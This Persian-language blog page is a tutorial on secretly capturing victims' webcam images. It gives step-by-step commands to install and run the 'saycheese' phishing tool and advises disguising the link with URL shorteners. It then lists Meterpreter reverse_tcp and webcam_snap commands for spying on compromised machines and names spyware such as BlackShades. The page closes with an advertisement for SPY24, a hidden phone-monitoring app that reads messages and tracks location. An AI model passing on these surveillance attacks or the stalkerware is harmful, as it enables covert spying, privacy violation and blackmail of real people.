اخبار هک و امنیت - آخرین و جدیدترینامنیت سایبری (Cyber Security)

هک وبکم با ارسال لینک به قربانی و گرفتن عکس از وبکم Hack Webcam

هک وبکم با ارسال لینک به قربانی و گرفتن عکس از وبکم در این آموزش به هک وبکم Hack Webcam با ارسال لینک به قربانی می پردازیم با ما همراه باشید. هک وبکم Hack Webcam با ارسال لینک به قربانی یکی از راههای جاسوسی افراد بدست گرفتن کنترل وبکم آنهاست.

  • آموزش رت SPYMAX و هک گوشی قربانی و سرقت اطلاعات

حریم خصوصی هر فردی قابل احترامه اما در این مقاله با هم میبینیم چطور میشه به راحتی این حریم شخصی رو شکست و به هک وبکم پرداخت و تصویری از شخص رو در سیستم خودمون ذخیره کنیم.باید دقت داشته باشید هر زمان وبکم شما فعال بشه چراغی در اطراف دوربین تعبیه شده و روشن میشه تا نشون دهنده این باشه که وبکم شما فعاله و شخصی در حال شماست.اگر حریم شخصی خیلی برای شما مهمه حتما درایور وبکم رو غیرفعال کنید یا از یک برچسب در مقابل دوربین استفاده کنید چون ممکنه قربانی بعدی شما باشید.در ادامه با شل Saycheese برای ساخت لینکی جهت هک وبکم آشنا می شوید.

نصب و راه اندازی شل Saycheese

برای نصب شل Saycheese یک خط فرمان در کالی باز کنید و دستور زیر را وارد نمایید.

git clone thelinuxchoice/saycheese

سپس از دستور زیر برای ورود به پوشه شل استفاده میکنیم.

cd saycheese

حالا با دستور زیر به شل مجوز اجرا میدیم.

chmod +x saycheese.sh

وقتشه شل رو اجرا کنید.

./saycheese.sh

همانطور که میبینید دو گزینه برای ساخت لینک و پورت فوروارد اتوماتیک دارید من گزینه ۲ رو انتخاب میکنم.

بعد از دانلود ، سرور استارت و لینکی برای فرستادن به قربانی برای Hack Webcam ساخته می شود.

با اجرای لینک توسط قربانی وبکم اون فعال میشه و شروع به گرفتن عکس و ارسال آنها به هکر میکنه.

شما میتونید لینک رو با کوتاه کننده های لینک موجود در اینترنت کوتاه کنید تا ظاهر موجه تری هم داشته باشه.

عزیزان دقت کنید اگر استفاده چندانی از وبکم ندارید حتما وبکم خودتون رو غیرفعال کنید یا برچسبی در مقابلش قرار بدید تا یک وقت قربانی این گونه حملات نشوید.

از سیر تا پیاز شبکه : آموزش هک ویندوز ۱۰ با ارسال لینک به قربانی Hack Webcam

آموزش تصویری هک وبکم با ارسال لینک به قربانی و گرفتن عکس از وبکم

امروزه از مرورگر ها بسیار زیاد استفاده میشه و همه ما تقریبا بیشتر وقتمون رو داریم با سرچ کردن در اینترنت میگذرونیم ، مرورگر ها اطلاعات مهمی درون خودشون دارن مثل یوزر ها پسورد ها ، کوکی ها و… که با این تفاسیر میشه گفت بستر مناسبی برای انجام حملات هست. جاوا اسکریپت به هکر ها کمک میکنه که بتونن عملیات های مختلفی رو از طریق مرورگر روی سیستم قربانی انجام بدن مثل بدست آوردن لوکیشن قربانی ، ریدارکت کردن قربانی به صفحه جعلی و…. پس جاوا اسکریپت زبان بسیار مهم و حیاتی برای انجام حملات سمت مروگر هاست.

حتما شنیدید که میگن با کلیک کردن روی یک لینک مثلا سیستمتون هک میشه یا هکر ها پسورد هاتون رو میدزدن یا خیلی چیز های دیگه ، شاید براتون جالب باشه که هکر ها چطوری از طریق لینک میتونن کار های غیرمجازی روی سیستم ما انجام بدن؟ با ما همراه باشید تا یادبگیریم چطوری میشه از طریق لینک از وبکم قربانی عکس گرفت ????

خب در قدم اول با دستور زیر ابزار saycheese رو دانلود میکنیم

بعد از دانلود ابزار وارد پوشه ابزار میشیم و با دستور زیر به فایل saycheese.sh دسترسی اجرایی میدیم

بعد از دادن دسترسی اجرایی با دستور زیر ابزار رو اجرا میکنیم

بعد از اجرای ابزار از ما میپرسه که از کدوم سرویس برای انجام حمله میخواهید استفاده کنید من اینجا serveo رو انتخاب میکنم برای اینکه بتونم حمله خودم رو خارج از شبکه داخلی نیز اجرا کنم

بعد از انتخاب serveo از ما راجب ساب دامین سوال میکنه که من دیفالت رو انتخاب میکنم و بعد از اون یک لینک برای ما نمایش داده که اون لینک رو ما باید برای قربانی ارسال کنیم (میتونید برای تمیز تر شدن کار از سایت های کوتاه کننده لینک نیز استفاده کنید)

بعد از اجرا لینک توسط قربانی مروگر از قربانی میخواد که دسترسی به وبکم رو تایید کنه که قربانی حتما باید روی گزینه allow کلیک کنه تا عکس از وبکم گرفته بشه در غیر اینصورت گرفته نمیشه

بعد از کلیک کردن قربانی روی گزینه allow میبینید که عکس از وبکم قربانی گرفته شده و برای شما ارسال شده ، عکس گرفته شده در پوشه ابزار ذخیره میشه

امیدوارم که از این آموزش لدت کافی رو برده باشید و همچنین جاوا اسکریپت رو شدیدا جدی بگیرید ????

هک وبکم و جاسوسی از وبکم لپ تاپ و کامپیوتر دیگران از چه روشی انجام میشود؟

یک کدام از ساده ترین شیوه های جاسوسی از افراد، بدست به چنگ آوردن کنترل دستگاه های همراه ایشان است. در شرایطی‌که کمی از دانش مرتبط با مباحث هک و امنیت برخوردار باشید میتوانید این عمل را انجام داده و بعضی از تجهیزات این دستگاه ها را در مشت گرفته و آن را شنود کنید. یکی‌از این ابزارها که می توان با بدست گرفتن کنترل آن، به جاسوسی از افراد مختلف پرداخت، وبکم لپ تاپ و کامپیوتر دسکتاپ میباشد. مقوله هک وبکم نیز همانند هک دوربین مداربسته هست و درین شیوه هکر با استفاده از برنامه ها و کدهای مخربی که روی سیستم هدف اجرا مینماید، میتواند کنترل وبکم و یا این که میکروفن لپ تاپ و کامپیوتر دسکتاپ را در اختیار گرفته و به جاسوسی بپردازد. در این بخش قصد داریم درباره با مبحث هک وبکم و شیوه های هک این ابزار، روی لپ تاپ ها و کامپیوترهای شخصی توضیحاتی ارائه داده و گونه های شیوه هک آن را برای دوست داران به مباحث هک و امنیت شرح دهیم.

هک وبکم به چه معناست؟

او‌لین نکته ای که ممکن میباشد برای خواننده سوال برانگیز باشد، این نکته میباشد که به طور کلی چرا می بایست یک نفر اقدام به هک وبکم متعلق به ما کند؟ برای جواب به‌این سوال باید بگوییم، شاید شما داده ها مهمی نداشته باشید که کسی بخواهد از آن سوء استفاده کند در صورتی که بسیاری از افراد دیگر میباشند که حریم خصوصی برای آنها بسیار پر اهمیت بوده و برای آن قیمت قائل می‌باشند. در مجموع بدست دریافت کردن در اختیار گرفتن وبکم بقیه افراد برای هکر به منظور های فراوانی انجام می‌شود. جاسوسی از افراد، بدست آوردن داده ها خصوصی، بدست آوردن پسوردهای محرمانه، کسب اطلاعات از روش زندگی و امور روزانه افراد، باج خواهی در مقابل عدم افشای اطلاعات و غیره، مواردی می‌باشند که هکر می‌تواند با هک وبکم به آن بپردازد.

وبکم لپ تاپ ها یک کدام از مطرح ترین ابزارهای جاسوسی برای هکرها محسوب می‌شوند

بخش اعظمی از افراد عادی بر این باورند که همواره از طریق وبکم ها و میکروفن ها در حالا چک شدن و کنترل می باشند. برخی از این نگرانی ها به حدی میرسد که گاها میکروفن های موجود در لپ تاپ ها را قطع کرده و روی وبکم را می پوشانند تا هکرها نتوانند از آن‌ها اطلاعاتی را کسب نمایند. باید بگوییم که‌این نگرانی ها چندان هم بی مورد وجود ندارد و بارها شنیده ایم که هکرها با استفاده از هک وبکم و میکروفن به جاسوسی از افراد گوناگون پرداخته و در قبال عدم افشای داده ها خصوصی ، از آنها تقاضای مبالغی را نموده اند. این نگرانی ها به حدی رسیده میباشد که حتی افرادی که خود سالها در زمینه فناوری و تکنولوژی کار دارند و از بروزترین و قوی ترین پروتکل های امنیتی استفاده می‌کنند، گاها احساس خطر نموده و با شیوه هایی سعی بر جلوگیری از آن دارند.

در همین راستا در طی چند هفته اخیر تصویری از برند زاکربرگ در دفتر کاری اش منتشر شد، که نشان می اعطا کرد، وی نیز از هک وبکم لپ تاپ خود توسط افراد سود جو احساس خطر کرده و آن را پوشانده میباشد! این نشان میدهد که حتی در حالتی که صاحب و مالک فیسبوک باشید و در یک کدام از ایمن ترین مکان های جهان مشغول به کار باشید، باز هم خطر هک وبکم شما موجود هست و از آن طریق افرادی می‌توانند به جاسوسی از شما بپردازند. پس به هیچ عنوان نباید به آنتی ویروس های قدرتمند و یا این که آنتی هک های نصب گردیده روی سیستم خود اطمینان صددرصدی داشته باشید و همیشه بدانید که راهی برای نفوذ پیدا می‌شود.

تصویری از برند زاکربرگ که در آن مشخص میباشد که او روی وبکم و میکروفن لپ تاپ خود را پوشانده میباشد.

روش های هک وبکم

در واقع روش های متعددی برای هک وبکم موجود هست که با مقدار کمی جستجو در فضای مجازی میتوانید به آنان دست پیدا کرده و هریک را آزمون نمائید. البته معمولی ترین منش ها برای هک وبکم، استعمال از برنامه های جاسوسی مخصوص بدین کار است که با نصب روی سیستم هدف، آغاز به کار مینمایند. این برنامه ها اغلب به طور تروجان، خود را در سیستم فرد پنهان کرده و علاوه بر انجام یک عمل کاربردی برای استفاده کننده که به آن احتیاج دارد، در خفا، اقدام به هک وبکم او نموده و از این شیوه به جاسوسی می‌پردازند. طریقه نوشتن یک برنامه تروجان برای بسیاری از هکر ها بسیار ساده بوده و تنها با گذراندن وقت اندکی، قادر به انجام چنین عملی هستند.

ولی در نهایت آنچه که در موفقیت و یا این که عدم موفقیت یک شیوه هک مفید میباشد، این میباشد که تا چه اندازه این عمل پنهانی بوده و استفاده کننده متوجه آن نشود. نکته مورد توجه دیگر در اکثر شیوه های هک این میباشد که از عدم اگاهی خود فرد قربانی برای هک وی استفاده می گردد. در حقیقت درصورتی که کاربر از آگاهی کافی درباره با چگونگی هک شدن و هک کردن داشته باشد، پس به سادگی نمی توان وی را هک نمود و به جاسوسی از او پرداخت. همینطور مقدار سطوح امنیتی بکار گرفته گردیده در شبکه و سیستم وی نیز عاملی تعیین کننده در میزان آسیب پذیری وی می‌باشد. پس با این اکانت هیچگاه نمی توان گفت که بطور قطع با روشی می توان موفق به هک تمامی وبکم ها شد.

نرم افزار های هک وبکم

همان گونه که اشاره شد، برنامه های مختلفی توسط انجمن های برنامه نویسی و هک برای انجام عمل هک وبکم تا به امروز معرفی شده‌است که برخی از آنها واقعا قادر به انجام چنین عملی هستند. اما این برنامه ها برای کار روی همه سیستم ها طراحی نشده اند و تنها قادرند به سیستم هایی نفوذ نمایند که آسیب پذیری لازم را در این زمینه را داشته باشند. برنامه هایی مثل Universal Webcam Hacker یا این که BlackShades و سایر برنامه ها و نرم افزارهای از این دست، بسیار فراوانند که می توان به وسیله آنها به هک وبکم افراد مختلف و جاسوسی از آن‌ها پرداخت.

همانطور که در تصویر مشاهده میکنید هکر توانسته با برنامه ای که نوشته به وبکم بسیاری از افراد دسترسی پیدا نماید.

نکته حائض اهمیت در استفاده از چنین برنامه هایی این میباشد که چون این برنامه ها توسط هکرها و برنامه نویس های مختلفی نوشته شده اند که گمنام بوده، نمی توان به سادگی به آن ها اعتماد نمود و همواره خطر هک شدن خودتان از سوی همین برنامه ها احساس می‌شود. به عبارتی دیگر، اکثر این برنامه قابل اعتماد نبوده و یا این که قصد بدست آوردن پول شمارا داشته و یا این که قصد جاسوسی از شما‌را دارا هستند. پس می بایست بیان کرد ابدا نباید به چنین برنامه هایی اعتماد فرمایید و به سادگی اجازه نصب آن‌ها‌را در سیستم خود بدهید.

هک وبکم از روش کالی لینوکس

ولی شایسته ترین و مطمئن ترین راهی که از روش آن می شود به هک وبکم و یا این که هر ابزار دیگری پرداخت، همانطور که در گذشته نیز به آن اشاره شده‌است، استفاده از سیستم عامل کالی لینوکس می‌باشد. با به کارگیری از فنون متااکسپلویت نویسی و طراحی تروجان های مختلف می شود به این هدف دست یافت که در اینجا مجالی برای توضیح این شیوه ها نداریم و صرفا به توضیح کلی آن خوا هیم پرداخت. با این اکنون در شرایطی که ذره ای در این مورد اطلاعات داشته باشید، میتوانید از همین توضیحات ساده نیز به هدف خود که یادگیری چگونگی انجام حمله هک وبکم می‌باشد، دست یابید.

در زمینه هک وبکم ، کالی لینوکس از ابزاری به اسم MeterPreter به کار گیری میکند که از روش MeterPreter Shell قابل کنترل میباشد. این برنامه زمانی قابل انجام میباشد که شما موفق به یک اکسپلویت به سیستم هدف گردیده باشید. به عبارت دیگر شما توانسته باشید یک تروجان یا این که برنامه مخرب نوشته و در سیستم هدف اجرا کرده و در نهایت اکسپلویت از ان گرفته باشید. بعداز اجرای این کد در سیستم هدف و گرفتن رابطه با آن، حال می‌توانید با استفاده از کدهای دستوری که در ادامه توضیح داده می‌گردد، از روش MeterPreter کنترل سیستم هدف را در اختیار گرفته و به هک وبکم یا این که هر مورد دیگری در آن بپردازید.

لیست دستورات مربوط به کنترل وبکم

بعداز اینکه پیروز شدید یک اکسپلویت به سیستم هدف بزنید و یک نشست با آن برقرار فرمایید، اکنون وقت آن میباشد که یک payload را اجرا نمایید. برای این منظور می توان از دستور پایین بهره گرفت:

set payload windows/meterpreter/reverse_tcp

بعد از اجرای این فرمان MeterPreter اجرا گردیده و از روش آن می شود به لیستی از دستوراتی که می توان انجام داد دست یافت. ما در اینجا درپی هک وبکم هستیم، پس دستور پایین را وارد می‌نماییم.

meterpreter > webcam_list

بعداز اجرای فرمان فوق، شما می‌توانید لیستی از وبکم های قربانی را مشاهده فرمائید که برای دریافت کردن تصویر از آن‌ها میتوانید از فرمان تحت استفاده فرمائید.

meterpreter > webcam_snap

با اجرای دستور فوق، یک تصویر از وبکم گرفته گردیده و در پوشه ای در مسیر /opt/framework3/msf3 ذخیره میشود. در شرایطی که بخواهیم بصورت زنده از وبکم هدف، ویدیو دریافت نمائید، کافی میباشد از دستور زیر به کار گیری فرمایید.

meterpreter > run webcam -p /var/www

در تصویر شیوه انجام هک را می‌بینید

با اجرای این چند دستور ساده در محیط ترمینال کالی لینوکس، قادر خواهید بود به سادگی اقدام به هک وبکم فرمایید. ولی این شرایط در صورتی قابل انجام میباشد که از قبل توانسته باشیم در سیستم هدف یک اکسپلویت اجرا کرده و با آن یک نشست برقرار کرده باشیم که در آموزش نوشتن رات اندروید، تا حدودی چگونگی انجام این کار را نیز توضیح مختصری داده ایم.

فیلم آموزش هک وبکم در کالی

هک تلفن همراه گوشی

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا